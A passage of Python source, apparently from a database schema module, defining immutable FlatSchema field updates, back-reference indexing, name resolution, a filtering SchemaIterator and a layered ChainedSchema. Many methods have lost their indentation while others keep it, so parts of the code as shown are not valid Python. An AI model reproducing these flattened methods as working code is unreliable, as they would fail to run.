                name_to_id, shortname_to_id, globalname_to_id = (
                    self._update_obj_name(
                        obj_id,
                        sclass,
                        data[findex],
                        value
                    )
                )

            if value is None:
                # Clearing the field: remember any outgoing refs so the
                # reverse index can be pruned.
                if field in reducible_fields and field in object_ref_fields:
                    orig_value = data[findex]
                    if orig_value is not None:
                        orig_refs[fieldname] = (
                            field.type.schema_refs_from_data(orig_value))
            else:
                if field in reducible_fields:
                    value = value.schema_reduce()

                if field in object_ref_fields:
                    new_refs[fieldname] = (
                        field.type.schema_refs_from_data(value))
                    orig_value = data[findex]
                    if orig_value is not None:
                        orig_refs[fieldname] = (
                            field.type.schema_refs_from_data(orig_value))

            data[findex] = value

        id_to_data = self._id_to_data.set(obj_id, tuple(data))
        refs_to = self._update_refs_to(obj_id, sclass, orig_refs, new_refs)
        return self._replace(name_to_id=name_to_id,
                             shortname_to_id=shortname_to_id,
                             globalname_to_id=globalname_to_id,
                             id_to_data=id_to_data,
                             refs_to=refs_to)
def maybe_get_obj_data_raw(
self,
obj: so.Object,
) -> Optional[Tuple[Any, ...]]:
return self._id_to_data.get(obj.id)
def get_obj_data_raw(
self,
obj: so.Object,
) -> Tuple[Any, ...]:
try:
return self._id_to_data[obj.id]
except KeyError:
err = (f'cannot get item data: item {str(obj.id)!r} '
f'is not present in the schema {self!r}')
raise errors.SchemaError(err) from None
    def set_obj_field(
        self,
        obj: so.Object,
        fieldname: str,
        value: Any,
    ) -> FlatSchema:
        """Return a new schema with one field of *obj* set to *value*.

        Raises SchemaError if the object is not present.  Renames update
        the name-lookup tables; object-reference fields also refresh the
        reverse-reference index.
        """
        obj_id = obj.id

        try:
            data = self._id_to_data[obj_id]
        except KeyError:
            err = (f'cannot set {fieldname!r} value: item {str(obj_id)!r} '
                   f'is not present in the schema {self!r}')
            raise errors.SchemaError(err) from None

        sclass = so.ObjectMeta.get_schema_class(self._id_to_type[obj_id])

        field = sclass.get_schema_field(fieldname)
        findex = field.index
        is_object_ref = field in sclass.get_object_reference_fields()

        # Store reducible values in their reduced (serializable) form.
        if field in sclass.get_reducible_fields():
            value = value.schema_reduce()

        name_to_id = None
        shortname_to_id = None
        globalname_to_id = None
        if fieldname == 'name':
            old_name = data[findex]
            name_to_id, shortname_to_id, globalname_to_id = (
                self._update_obj_name(obj_id, sclass, old_name, value)
            )

        data_list = list(data)
        data_list[findex] = value
        new_data = tuple(data_list)

        id_to_data = self._id_to_data.set(obj_id, new_data)

        if not is_object_ref:
            refs_to = None
        else:
            # Diff old vs new outgoing references for the reverse index.
            orig_value = data[findex]
            if orig_value is not None:
                orig_refs = {
                    fieldname: field.type.schema_refs_from_data(orig_value),
                }
            else:
                orig_refs = {}

            new_refs = {fieldname: field.type.schema_refs_from_data(value)}
            refs_to = self._update_refs_to(obj_id, sclass, orig_refs, new_refs)

        return self._replace(
            name_to_id=name_to_id,
            shortname_to_id=shortname_to_id,
            globalname_to_id=globalname_to_id,
            id_to_data=id_to_data,
            refs_to=refs_to,
        )
    def unset_obj_field(
        self,
        obj: so.Object,
        fieldname: str,
    ) -> FlatSchema:
        """Return a new schema with one field of *obj* cleared to None.

        A no-op (returns self) if the object is absent or the field is
        already unset.  Clearing 'name' deregisters the object from the
        name-lookup tables; object-reference fields also prune the
        reverse-reference index.
        """
        obj_id = obj.id

        try:
            data = self._id_to_data[obj.id]
        except KeyError:
            return self

        sclass = so.ObjectMeta.get_schema_class(self._id_to_type[obj.id])
        field = sclass.get_schema_field(fieldname)
        findex = field.index

        name_to_id = None
        shortname_to_id = None
        globalname_to_id = None
        orig_value = data[findex]

        if orig_value is None:
            # Already unset; nothing to do.
            return self

        if fieldname == 'name':
            name_to_id, shortname_to_id, globalname_to_id = (
                self._update_obj_name(
                    obj_id,
                    sclass,
                    orig_value,
                    None
                )
            )

        data_list = list(data)
        data_list[findex] = None
        new_data = tuple(data_list)
        id_to_data = self._id_to_data.set(obj_id, new_data)

        is_object_ref = field in sclass.get_object_reference_fields()

        if not is_object_ref:
            refs_to = None
        else:
            orig_refs = {
                fieldname: field.type.schema_refs_from_data(orig_value),
            }
            refs_to = self._update_refs_to(obj_id, sclass, orig_refs, None)

        return self._replace(
            name_to_id=name_to_id,
            shortname_to_id=shortname_to_id,
            globalname_to_id=globalname_to_id,
            id_to_data=id_to_data,
            refs_to=refs_to,
        )
    def _update_refs_to(
        self,
        object_id: uuid.UUID,
        sclass: Type[so.Object],
        orig_refs: Optional[Mapping[str, FrozenSet[uuid.UUID]]],
        new_refs: Optional[Mapping[str, FrozenSet[uuid.UUID]]],
    ) -> Refs_T:
        """Recompute the back-reference index for *object_id*.

        ``_refs_to`` maps: referred-object id -> Map[(referrer class,
        field name) -> Map[referrer id -> None]] (the innermost map is
        used as a set).  For every object-reference field of *sclass*,
        ids present only in *new_refs* gain an entry pointing back at
        *object_id*, and ids present only in *orig_refs* lose theirs.
        Returns the updated immutable map.
        """
        objfields = sclass.get_object_reference_fields()
        if not objfields:
            # Nothing can refer to anything through this class.
            return self._refs_to
        with self._refs_to.mutate() as mm:
            for field in objfields:
                if not new_refs:
                    ids = None
                else:
                    ids = new_refs.get(field.name)
                if not orig_refs:
                    orig_ids = None
                else:
                    orig_ids = orig_refs.get(field.name)
                if not ids and not orig_ids:
                    continue
                old_ids: Optional[FrozenSet[uuid.UUID]]
                new_ids: Optional[FrozenSet[uuid.UUID]]
                key = (sclass, field.name)
                if ids and orig_ids:
                    # Only the delta between old and new needs updating.
                    new_ids = ids - orig_ids
                    old_ids = orig_ids - ids
                elif ids:
                    new_ids = ids
                    old_ids = None
                else:
                    new_ids = None
                    old_ids = orig_ids
                if new_ids:
                    for ref_id in new_ids:
                        try:
                            refs = mm[ref_id]
                        except KeyError:
                            # First back-reference recorded for ref_id.
                            mm[ref_id] = immu.Map((
                                (key, immu.Map(((object_id, None),))),
                            ))
                        else:
                            try:
                                field_refs = refs[key]
                            except KeyError:
                                field_refs = immu.Map(((object_id, None),))
                            else:
                                field_refs = field_refs.set(object_id, None)
                            mm[ref_id] = refs.set(key, field_refs)
                if old_ids:
                    for ref_id in old_ids:
                        refs = mm[ref_id]
                        field_refs = refs[key].delete(object_id)
                        if not field_refs:
                            # Last referrer through this key is gone.
                            mm[ref_id] = refs.delete(key)
                        else:
                            mm[ref_id] = refs.set(key, field_refs)
            result = mm.finish()
        return result
    def add_raw(
        self,
        id: uuid.UUID,
        sclass: Type[so.Object],
        data: Tuple[Any, ...],
    ) -> FlatSchema:
        """Insert an object with pre-reduced field *data*.

        Raises SchemaError on a duplicate name or id, and
        UnknownModuleError when a qualified name references a module that
        is not in this schema ('__derived__' excepted).
        """
        name_field = sclass.get_schema_field('name')
        name = data[name_field.index]
        if name in self._name_to_id:
            other_obj = self.get_by_id(
                self._name_to_id[name], type=so.Object)
            vn = other_obj.get_verbosename(self, with_parent=True)
            raise errors.SchemaError(f'{vn} already exists')
        if id in self._id_to_data:
            raise errors.SchemaError(
                f'{sclass.__name__} ({str(id)!r}) is already present '
                f'in the schema {self!r}')
        object_ref_fields = sclass.get_object_reference_fields()
        if not object_ref_fields:
            refs_to = None
        else:
            # Register back-references for every object-reference field.
            new_refs = {}
            for field in object_ref_fields:
                ref = data[field.index]
                if ref is not None:
                    ref = field.type.schema_refs_from_data(ref)
                    new_refs[field.name] = ref
            refs_to = self._update_refs_to(id, sclass, None, new_refs)
        name_to_id, shortname_to_id, globalname_to_id = self._update_obj_name(
            id, sclass, None, name)
        updates = dict(
            id_to_data=self._id_to_data.set(id, data),
            id_to_type=self._id_to_type.set(id, sclass.__name__),
            name_to_id=name_to_id,
            shortname_to_id=shortname_to_id,
            globalname_to_id=globalname_to_id,
            refs_to=refs_to,
        )
        # Validate the module last; the updates dict above is discarded
        # when this raises.
        if (
            issubclass(sclass, so.QualifiedObject)
            and not self.has_module(name.module)
            and name.module != '__derived__'
        ):
            raise errors.UnknownModuleError(
                f'module {name.module!r} is not in this schema')
        return self._replace(**updates)  # type: ignore
def add(
self,
id: uuid.UUID,
sclass: Type[so.Object],
data: Tuple[Any, ...],
) -> FlatSchema:
reducible_fields = sclass.get_reducible_fields()
if reducible_fields:
data_list = list(data)
for field in reducible_fields:
val = data[field.index]
if val is not None:
data_list[field.index] = val.schema_reduce()
data = tuple(data_list)
return self.add_raw(id, sclass, data)
    def _delete(self, obj: so.Object) -> FlatSchema:
        """Remove *obj* and every index entry derived from it.

        Raises InvalidReferenceError if *obj* is not in this schema.
        """
        data = self._id_to_data.get(obj.id)
        if data is None:
            raise errors.InvalidReferenceError(
                f'cannot delete {obj!r}: not in this schema')
        sclass = type(obj)
        name_field = sclass.get_schema_field('name')
        name = data[name_field.index]
        updates = {}
        # Drop the object from the name indexes.
        name_to_id, shortname_to_id, globalname_to_id = self._update_obj_name(
            obj.id, sclass, name, None)
        object_ref_fields = sclass.get_object_reference_fields()
        if not object_ref_fields:
            refs_to = None
        else:
            # Remove the back-references this object contributed.
            values = self._id_to_data[obj.id]
            orig_refs = {}
            for field in object_ref_fields:
                ref = values[field.index]
                if ref is not None:
                    ref = field.type.schema_refs_from_data(ref)
                    orig_refs[field.name] = ref
            refs_to = self._update_refs_to(obj.id, sclass, orig_refs, None)
        updates.update(dict(
            name_to_id=name_to_id,
            shortname_to_id=shortname_to_id,
            globalname_to_id=globalname_to_id,
            id_to_data=self._id_to_data.delete(obj.id),
            id_to_type=self._id_to_type.delete(obj.id),
            refs_to=refs_to,
        ))
        return self._replace(**updates)  # type: ignore
def discard(self, obj: so.Object) -> FlatSchema:
if obj.id in self._id_to_data:
return self._delete(obj)
else:
return self
    def delete(self, obj: so.Object) -> FlatSchema:
        """Remove *obj*; raises InvalidReferenceError if not present."""
        return self._delete(obj)
    def _search_with_getter(
        self,
        name: Union[str, sn.Name],
        *,
        getter: Callable[[FlatSchema, sn.Name], Any],
        default: Any,
        module_aliases: Optional[Mapping[Optional[str], str]],
    ) -> Any:
        """Resolve *name* through *getter*, applying module resolution.

        Resolution order:
          1. the special '__std__' module maps directly to 'std';
          2. the (possibly alias-expanded) explicit module, if any;
          3. the implicit 'std' fallback, for unqualified names only.
        Returns *default* when nothing matches.
        """
        if isinstance(name, str):
            name = sn.name_from_string(name)
        shortname = name.name
        module = name.module if isinstance(name, sn.QualName) else None
        # Only originally-unqualified names may fall back to std below.
        implicit_builtins = module is None
        if module == '__std__':
            fqname = sn.QualName('std', shortname)
            result = getter(self, fqname)
            if result is not None:
                return result
            else:
                return default
        if module_aliases is not None:
            # Expand through the alias map; the None key holds the default
            # module for unqualified names.
            fq_module = module_aliases.get(module)
            if fq_module is not None:
                module = fq_module
        if module is not None:
            fqname = sn.QualName(module, shortname)
            result = getter(self, fqname)
            if result is not None:
                return result
        if implicit_builtins:
            # Implicit std fallback for unqualified names.
            fqname = sn.QualName('std', shortname)
            result = getter(self, fqname)
            if result is not None:
                return result
        return default
def get_functions(
self,
name: Union[str, sn.Name],
default: Union[
Tuple[s_func.Function, ...], so.NoDefaultT
] = so.NoDefault,
*,
module_aliases: Optional[Mapping[Optional[str], str]] = None,
) -> Tuple[s_func.Function, ...]:
if isinstance(name, str):
name = sn.name_from_string(name)
funcs = self._search_with_getter(
name,
getter=_get_functions,
module_aliases=module_aliases,
default=default,
)
if funcs is not so.NoDefault:
return cast(
Tuple[s_func.Function, ...],
funcs,
)
else:
return self._raise_bad_reference(
name=name,
module_aliases=module_aliases,
type=s_func.Function,
)
def get_operators(
self,
name: Union[str, sn.Name],
default: Union[
Tuple[s_oper.Operator, ...], so.NoDefaultT
] = so.NoDefault,
*,
module_aliases: Optional[Mapping[Optional[str], str]] = None,
) -> Tuple[s_oper.Operator, ...]:
funcs = self._search_with_getter(
name,
getter=_get_operators,
module_aliases=module_aliases,
default=default,
)
if funcs is not so.NoDefault:
return cast(
Tuple[s_oper.Operator, ...],
funcs,
)
else:
return self._raise_bad_reference(
name=name,
module_aliases=module_aliases,
type=s_oper.Operator,
)
@functools.lru_cache()
def _get_casts(
self,
stype: s_types.Type,
*,
disposition: str,
implicit: bool = False,
assignment: bool = False,
) -> FrozenSet[s_casts.Cast]:
all_casts = cast(
FrozenSet[s_casts.Cast],
self.get_referrers(
stype, scls_type=s_casts.Cast, field_name=disposition),
)
casts = []
for castobj in all_casts:
if implicit and not castobj.get_allow_implicit(self):
continue
if assignment and not castobj.get_allow_assignment(self):
continue
casts.append(castobj)
return frozenset(casts)
def get_casts_to_type(
self,
to_type: s_types.Type,
*,
implicit: bool = False,
assignment: bool = False,
) -> FrozenSet[s_casts.Cast]:
return self._get_casts(to_type, disposition='to_type',
implicit=implicit, assignment=assignment)
def get_casts_from_type(
self,
from_type: s_types.Type,
*,
implicit: bool = False,
assignment: bool = False,
) -> FrozenSet[s_casts.Cast]:
return self._get_casts(from_type, disposition='from_type',
implicit=implicit, assignment=assignment)
    def get_referrers(
        self,
        scls: so.Object,
        *,
        scls_type: Optional[Type[so.Object_T]] = None,
        field_name: Optional[str] = None,
    ) -> FrozenSet[so.Object_T]:
        """Return objects referencing *scls*; see _get_referrers (cached)."""
        return self._get_referrers(
            scls, scls_type=scls_type, field_name=field_name)
@functools.lru_cache()
def _get_referrers(
self,
scls: so.Object,
*,
scls_type: Optional[Type[so.Object_T]] = None,
field_name: Optional[str] = None,
) -> FrozenSet[so.Object_T]:
try:
refs = self._refs_to[scls.id]
except KeyError:
return frozenset()
else:
referrers: Set[so.Object] = set()
if scls_type is not None:
if field_name is not None:
for (st, fn), ids in refs.items():
if issubclass(st, scls_type) and fn == field_name:
referrers.update(
self.get_by_id(objid) for objid in ids)
else:
for (st, _), ids in refs.items():
if issubclass(st, scls_type):
referrers.update(
self.get_by_id(objid) for objid in ids)
elif field_name is not None:
for (_, fn), ids in refs.items():
if fn == field_name:
referrers.update(
self.get_by_id(objid) for objid in ids)
else:
refids = itertools.chain.from_iterable(refs.values())
referrers.update(self.get_by_id(objid) for objid in refids)
return frozenset(referrers) # type: ignore
@functools.lru_cache()
def get_referrers_ex(
self,
scls: so.Object,
*,
scls_type: Optional[Type[so.Object_T]] = None,
) -> Dict[
Tuple[Type[so.Object_T], str],
FrozenSet[so.Object_T],
]:
try:
refs = self._refs_to[scls.id]
except KeyError:
return {}
else:
result = {}
if scls_type is not None:
for (st, fn), ids in refs.items():
if issubclass(st, scls_type):
result[st, fn] = frozenset(
self.get_by_id(objid) for objid in ids)
else:
for (st, fn), ids in refs.items():
result[st, fn] = frozenset( # type: ignore
self.get_by_id(objid) for objid in ids)
return result # type: ignore
def _get_by_id( # NoQA: F811
self,
obj_id: uuid.UUID,
default: Union[so.Object_T, so.NoDefaultT, None],
*,
type: Optional[Type[so.Object_T]],
) -> Optional[so.Object_T]:
try:
sclass_name = self._id_to_type[obj_id]
except KeyError:
if default is so.NoDefault:
raise errors.InvalidReferenceError(
f'reference to a non-existent schema item {obj_id}'
f' in schema {self!r}'
) from None
else:
return default
else:
obj = so.Object.schema_restore((sclass_name, obj_id))
if type is not None and not isinstance(obj, type):
raise errors.InvalidReferenceError(
f'schema object {obj_id!r} exists, but is a '
f'{obj.__class__.get_schema_class_displayname()!r}, '
f'not a {type.get_schema_class_displayname()!r}'
)
# Avoid the overhead of cast(Object_T) below
return obj # type: ignore
def _get_global(
self,
objtype: Type[so.Object_T],
name: Union[str, sn.Name],
default: Union[so.Object_T, so.NoDefaultT, None],
) -> Optional[so.Object_T]:
if isinstance(name, str):
name = sn.UnqualName(name)
obj_id = self._globalname_to_id.get((objtype, name))
if obj_id is not None:
return self.get_by_id(obj_id) # type: ignore
elif default is not so.NoDefault:
return default
else:
self._raise_bad_reference(name, type=objtype)
    def _get(
        self,
        name: Union[str, sn.Name],
        default: Union[so.Object, so.NoDefaultT, None],
        *,
        module_aliases: Optional[Mapping[Optional[str], str]],
        type: Optional[Type[so.Object_T]],
        condition: Optional[Callable[[so.Object], bool]],
        label: Optional[str],
        sourcectx: Optional[parsing.ParserContext],
    ) -> Optional[so.Object]:
        """Core name-based lookup.

        Resolves *name* via _search_with_getter (module aliases and the
        implicit std fallback apply), optionally filters with *condition*,
        and type-checks against *type* with a user-friendly error.  Raises
        InvalidReferenceError when nothing matches and *default* is
        so.NoDefault.
        """
        def getter(schema: FlatSchema, name: sn.Name) -> Optional[so.Object]:
            # Map a fully-qualified name to an object, honoring *condition*.
            obj_id = schema._name_to_id.get(name)
            if obj_id is None:
                return None
            obj = schema.get_by_id(obj_id, default=None)
            if obj is not None and condition is not None:
                if not condition(obj):
                    obj = None
            return obj
        obj = self._search_with_getter(
            name,
            getter=getter,
            module_aliases=module_aliases,
            default=default,
        )
        if obj is not so.NoDefault:
            # We do our own type check, instead of using get_by_id's, so
            # we can produce a user-facing error message.
            if obj and type is not None and not isinstance(obj, type):
                refname = str(name)
                got_name = obj.__class__.get_schema_class_displayname()
                exp_name = type.get_schema_class_displayname()
                raise errors.InvalidReferenceError(
                    f'{refname!r} exists, but is {english.add_a(got_name)}, '
                    f'not {english.add_a(exp_name)}',
                    context=sourcectx,
                )
            return obj  # type: ignore
        else:
            self._raise_bad_reference(
                name=name,
                label=label,
                module_aliases=module_aliases,
                sourcectx=sourcectx,
                type=type,
            )
    def _raise_bad_reference(
        self,
        name: Union[str, sn.Name],
        *,
        label: Optional[str] = None,
        module_aliases: Optional[Mapping[Optional[str], str]] = None,
        sourcectx: Optional[parsing.ParserContext] = None,
        type: Optional[Type[so.Object]] = None,
    ) -> NoReturn:
        """Raise InvalidReferenceError for an unresolvable *name*.

        The message uses the type-specific display name when *type* is
        known, qualifying unqualified names with the default module alias
        (keyed None in *module_aliases*) if one was provided.
        """
        refname = str(name)
        if label is None:
            # Derive a human-readable label from the expected type, if any.
            if type is not None:
                label = type.get_schema_class_displayname()
            else:
                label = 'schema item'
        if type is not None:
            if issubclass(type, so.QualifiedObject):
                if not sn.is_qualified(refname):
                    if module_aliases is not None:
                        default_module = module_aliases.get(None)
                        if default_module is not None:
                            refname = type.get_displayname_static(
                                sn.QualName(default_module, refname),
                            )
                else:
                    refname = type.get_displayname_static(
                        sn.QualName.from_string(refname))
            else:
                refname = type.get_displayname_static(
                    sn.UnqualName.from_string(refname))
        raise errors.InvalidReferenceError(
            f'{label} {refname!r} does not exist',
            context=sourcectx,
        )
    def has_object(self, object_id: uuid.UUID) -> bool:
        """True if an object with *object_id* exists in this schema."""
        return object_id in self._id_to_type
def has_module(self, module: str) -> bool:
return self.get_global(s_mod.Module, module, None) is not None
    def get_objects(
        self,
        *,
        exclude_stdlib: bool = False,
        exclude_global: bool = False,
        exclude_internal: bool = True,
        included_modules: Optional[Iterable[sn.Name]] = None,
        excluded_modules: Optional[Iterable[sn.Name]] = None,
        included_items: Optional[Iterable[sn.Name]] = None,
        excluded_items: Optional[Iterable[sn.Name]] = None,
        type: Optional[Type[so.Object_T]] = None,
        extra_filters: Iterable[Callable[[Schema, so.Object], bool]] = (),
    ) -> SchemaIterator[so.Object_T]:
        """Return a lazy iterator over all objects matching the filters."""
        return SchemaIterator[so.Object_T](
            self,
            # _id_to_type iterates as its keys (object ids).
            self._id_to_type,
            exclude_stdlib=exclude_stdlib,
            exclude_global=exclude_global,
            exclude_internal=exclude_internal,
            included_modules=included_modules,
            excluded_modules=excluded_modules,
            included_items=included_items,
            excluded_items=excluded_items,
            type=type,
            extra_filters=extra_filters,
        )
def get_modules(self) -> Tuple[s_mod.Module, ...]:
modules = []
for (objtype, _), objid in self._globalname_to_id.items():
if objtype is s_mod.Module:
modules.append(self.get_by_id(objid, type=s_mod.Module))
return tuple(modules)
    def get_last_migration(self) -> Optional[s_migrations.Migration]:
        """Return the newest migration, or None (cached helper)."""
        return _get_last_migration(self)
def __repr__(self) -> str:
return (
f'<{type(self).__name__} gen:{self._generation} at {id(self):#x}>')
class SchemaIterator(Generic[so.Object_T]):
    """Lazily filters and yields schema objects by id.

    All filter predicates are constructed once at initialization and
    applied to every object during iteration.
    """

    def __init__(
        self,
        schema: Schema,
        object_ids: Iterable[uuid.UUID],
        *,
        exclude_stdlib: bool = False,
        exclude_global: bool = False,
        exclude_internal: bool = True,
        included_modules: Optional[Iterable[sn.Name]],
        excluded_modules: Optional[Iterable[sn.Name]],
        included_items: Optional[Iterable[sn.Name]] = None,
        excluded_items: Optional[Iterable[sn.Name]] = None,
        type: Optional[Type[so.Object_T]] = None,
        extra_filters: Iterable[Callable[[Schema, so.Object], bool]] = (),
    ) -> None:
        filters = []

        if type is not None:
            # Bind to a fresh local so the closure does not capture the
            # ``type`` parameter name (which shadows the builtin).
            t = type
            filters.append(lambda schema, obj: isinstance(obj, t))

        if included_modules:
            modules = frozenset(included_modules)
            filters.append(
                lambda schema, obj:
                    isinstance(obj, so.QualifiedObject) and
                    obj.get_name(schema).get_module_name() in modules)

        if excluded_modules or exclude_stdlib:
            excmod: Set[sn.Name] = set()
            if excluded_modules:
                excmod.update(excluded_modules)
            if exclude_stdlib:
                excmod.update(STD_MODULES)
            filters.append(
                lambda schema, obj: (
                    not isinstance(obj, so.QualifiedObject)
                    or obj.get_name(schema).get_module_name() not in excmod
                )
            )

        if included_items:
            # BUGFIX: each closure must capture its own set.  Previously
            # both this lambda and the excluded_items one below closed
            # over the *same* local variable (``objs``), so when both
            # filters were supplied the inclusion filter ended up testing
            # membership in the exclusion set (late-binding closure bug).
            included_names = frozenset(included_items)
            filters.append(
                lambda schema, obj: obj.get_name(schema) in included_names)

        if excluded_items:
            excluded_names = frozenset(excluded_items)
            filters.append(
                lambda schema, obj:
                    obj.get_name(schema) not in excluded_names)

        if exclude_stdlib:
            # Pseudo-types are treated as part of the standard library.
            filters.append(
                lambda schema, obj: not isinstance(obj, s_pseudo.PseudoType)
            )

        if exclude_global:
            filters.append(
                lambda schema, obj: not isinstance(obj, so.GlobalObject)
            )

        if exclude_internal:
            filters.append(
                lambda schema, obj: not isinstance(obj, so.InternalObject)
            )

        # Extra filters are last, because they might depend on type.
        filters.extend(extra_filters)

        self._filters = filters
        self._schema = schema
        self._object_ids = object_ids

    def __iter__(self) -> Iterator[so.Object_T]:
        filters = self._filters
        schema = self._schema
        get_by_id = schema.get_by_id
        for obj_id in self._object_ids:
            obj = get_by_id(obj_id)
            if all(f(self._schema, obj) for f in filters):
                yield obj  # type: ignore
class ChainedSchema(Schema):
    """Three stacked FlatSchemas presented as one schema.

    ``_base_schema`` holds the read-only std/builtin layer,
    ``_top_schema`` the user-modifiable layer, and ``_global_schema``
    the globally-scoped objects.  Reads consult top first, then base;
    global objects are routed to the global layer.  Every mutation
    returns a new ChainedSchema (the layers are immutable).
    """
    __slots__ = ('_base_schema', '_top_schema', '_global_schema')

    def __init__(
        self,
        base_schema: FlatSchema,
        top_schema: FlatSchema,
        global_schema: FlatSchema
    ) -> None:
        self._base_schema = base_schema
        self._top_schema = top_schema
        self._global_schema = global_schema

    def get_top_schema(self) -> FlatSchema:
        """Return the user-modifiable layer."""
        return self._top_schema

    def get_global_schema(self) -> FlatSchema:
        """Return the layer holding global objects."""
        return self._global_schema

    def add_raw(
        self,
        id: uuid.UUID,
        sclass: Type[so.Object],
        data: Tuple[Any, ...],
    ) -> ChainedSchema:
        """Insert pre-reduced object data into the appropriate layer."""
        if issubclass(sclass, so.GlobalObject):
            return ChainedSchema(
                self._base_schema,
                self._top_schema,
                self._global_schema.add_raw(id, sclass, data),
            )
        else:
            return ChainedSchema(
                self._base_schema,
                self._top_schema.add_raw(id, sclass, data),
                self._global_schema,
            )

    def add(
        self,
        id: uuid.UUID,
        sclass: Type[so.Object],
        data: Tuple[Any, ...],
    ) -> ChainedSchema:
        """Insert a new object into the appropriate layer."""
        if issubclass(sclass, so.GlobalObject):
            return ChainedSchema(
                self._base_schema,
                self._top_schema,
                self._global_schema.add(id, sclass, data),
            )
        else:
            return ChainedSchema(
                self._base_schema,
                self._top_schema.add(id, sclass, data),
                self._global_schema,
            )

    def discard(self, obj: so.Object) -> ChainedSchema:
        """Remove *obj* if present; no error when it is missing."""
        if isinstance(obj, so.GlobalObject):
            return ChainedSchema(
                self._base_schema,
                self._top_schema,
                self._global_schema.discard(obj),
            )
        else:
            return ChainedSchema(
                self._base_schema,
                self._top_schema.discard(obj),
                self._global_schema,
            )

    def delete(self, obj: so.Object) -> ChainedSchema:
        """Remove *obj*; raises if it is not present in its layer."""
        if isinstance(obj, so.GlobalObject):
            return ChainedSchema(
                self._base_schema,
                self._top_schema,
                self._global_schema.delete(obj),
            )
        else:
            return ChainedSchema(
                self._base_schema,
                self._top_schema.delete(obj),
                self._global_schema,
            )

    def update_obj(
        self,
        obj: so.Object,
        updates: Mapping[str, Any],
    ) -> ChainedSchema:
        """Apply field *updates* to *obj*.

        Objects living only in the base layer are first copied into the
        top layer (copy-on-write), so the base layer is never mutated.
        """
        if isinstance(obj, so.GlobalObject):
            return ChainedSchema(
                self._base_schema,
                self._top_schema,
                self._global_schema.update_obj(obj, updates),
            )
        else:
            obj_id = obj.id
            base_obj = self._base_schema.get_by_id(obj_id, default=None)
            if (
                base_obj is not None
                and not self._top_schema.has_object(obj_id)
            ):
                # Copy-on-write: materialize the base object in the top
                # layer before applying the update there.
                top_schema = self._top_schema.add_raw(
                    obj_id,
                    type(base_obj),
                    self._base_schema._id_to_data[obj_id],
                )
            else:
                top_schema = self._top_schema
            return ChainedSchema(
                self._base_schema,
                top_schema.update_obj(obj, updates),
                self._global_schema,
            )

    def maybe_get_obj_data_raw(
        self,
        obj: so.Object,
    ) -> Optional[Tuple[Any, ...]]:
        """Return the raw data tuple for *obj*, or None if absent."""
        if isinstance(obj, so.GlobalObject):
            return self._global_schema.maybe_get_obj_data_raw(obj)
        else:
            top = self._top_schema.maybe_get_obj_data_raw(obj)
            if top is not None:
                return top
            else:
                return self._base_schema.maybe_get_obj_data_raw(obj)

    def get_obj_data_raw(
        self,
        obj: so.Object,
    ) -> Tuple[Any, ...]:
        """Return the raw data tuple for *obj*; raises if absent."""
        if isinstance(obj, so.GlobalObject):
            return self._global_schema.get_obj_data_raw(obj)
        else:
            top = self._top_schema.maybe_get_obj_data_raw(obj)
            if top is not None:
                return top
            else:
                return self._base_schema.get_obj_data_raw(obj)

    def set_obj_field(
        self,
        obj: so.Object,
        fieldname: str,
        value: Any,
    ) -> ChainedSchema:
        """Set a single field on *obj* in the appropriate layer."""
        if isinstance(obj, so.GlobalObject):
            return ChainedSchema(
                self._base_schema,
                self._top_schema,
                self._global_schema.set_obj_field(obj, fieldname, value),
            )
        else:
            return ChainedSchema(
                self._base_schema,
                self._top_schema.set_obj_field(obj, fieldname, value),
                self._global_schema,
            )

    def unset_obj_field(
        self,
        obj: so.Object,
        field: str,
    ) -> ChainedSchema:
        """Reset a single field on *obj* in the appropriate layer."""
        if isinstance(obj, so.GlobalObject):
            return ChainedSchema(
                self._base_schema,
                self._top_schema,
                self._global_schema.unset_obj_field(obj, field),
            )
        else:
            return ChainedSchema(
                self._base_schema,
                self._top_schema.unset_obj_field(obj, field),
                self._global_schema,
            )

    def get_functions(
        self,
        name: Union[str, sn.Name],
        default: Union[
            Tuple[s_func.Function, ...], so.NoDefaultT
        ] = so.NoDefault,
        *,
        module_aliases: Optional[Mapping[Optional[str], str]] = None,
    ) -> Tuple[s_func.Function, ...]:
        """Find functions by name, preferring the top layer."""
        objs = self._top_schema.get_functions(
            name, module_aliases=module_aliases, default=())
        if not objs:
            objs = self._base_schema.get_functions(
                name, default=default, module_aliases=module_aliases)
        return objs

    def get_operators(
        self,
        name: Union[str, sn.Name],
        default: Union[
            Tuple[s_oper.Operator, ...], so.NoDefaultT
        ] = so.NoDefault,
        *,
        module_aliases: Optional[Mapping[Optional[str], str]] = None,
    ) -> Tuple[s_oper.Operator, ...]:
        """Find operators by name, preferring the top layer."""
        objs = self._top_schema.get_operators(
            name, module_aliases=module_aliases, default=())
        if not objs:
            objs = self._base_schema.get_operators(
                name, default=default, module_aliases=module_aliases)
        return objs

    def get_casts_to_type(
        self,
        to_type: s_types.Type,
        *,
        implicit: bool = False,
        assignment: bool = False,
    ) -> FrozenSet[s_casts.Cast]:
        """Union of casts targeting *to_type* from both schema layers."""
        return (
            self._base_schema.get_casts_to_type(
                to_type,
                implicit=implicit,
                assignment=assignment,
            )
            | self._top_schema.get_casts_to_type(
                to_type,
                implicit=implicit,
                assignment=assignment,
            )
        )

    def get_casts_from_type(
        self,
        from_type: s_types.Type,
        *,
        implicit: bool = False,
        assignment: bool = False,
    ) -> FrozenSet[s_casts.Cast]:
        """Union of casts originating at *from_type* from both layers."""
        return (
            self._base_schema.get_casts_from_type(
                from_type,
                implicit=implicit,
                assignment=assignment,
            )
            | self._top_schema.get_casts_from_type(
                from_type,
                implicit=implicit,
                assignment=assignment,
            )
        )

    def get_referrers(
        self,
        scls: so.Object,
        *,
        scls_type: Optional[Type[so.Object_T]] = None,
        field_name: Optional[str] = None,
    ) -> FrozenSet[so.Object_T]:
        """Union of referrers of *scls* across all three layers."""
        return (
            self._base_schema.get_referrers(
                scls,
                scls_type=scls_type,
                field_name=field_name,
            )
            | self._top_schema.get_referrers(
                scls,
                scls_type=scls_type,
                field_name=field_name,
            )
            | self._global_schema.get_referrers(
                scls,
                scls_type=scls_type,
                field_name=field_name,
            )
        )

    def get_referrers_ex(
        self,
        scls: so.Object,
        *,
        scls_type: Optional[Type[so.Object_T]] = None,
    ) -> Dict[
        Tuple[Type[so.Object_T], str],
        FrozenSet[so.Object_T],
    ]:
        """Merge grouped referrers of *scls* from all three layers."""
        base = self._base_schema.get_referrers_ex(scls, scls_type=scls_type)
        top = self._top_schema.get_referrers_ex(scls, scls_type=scls_type)
        gl = self._global_schema.get_referrers_ex(scls, scls_type=scls_type)
        return {
            k: (
                base.get(k, frozenset())
                | top.get(k, frozenset())
                | gl.get(k, frozenset())
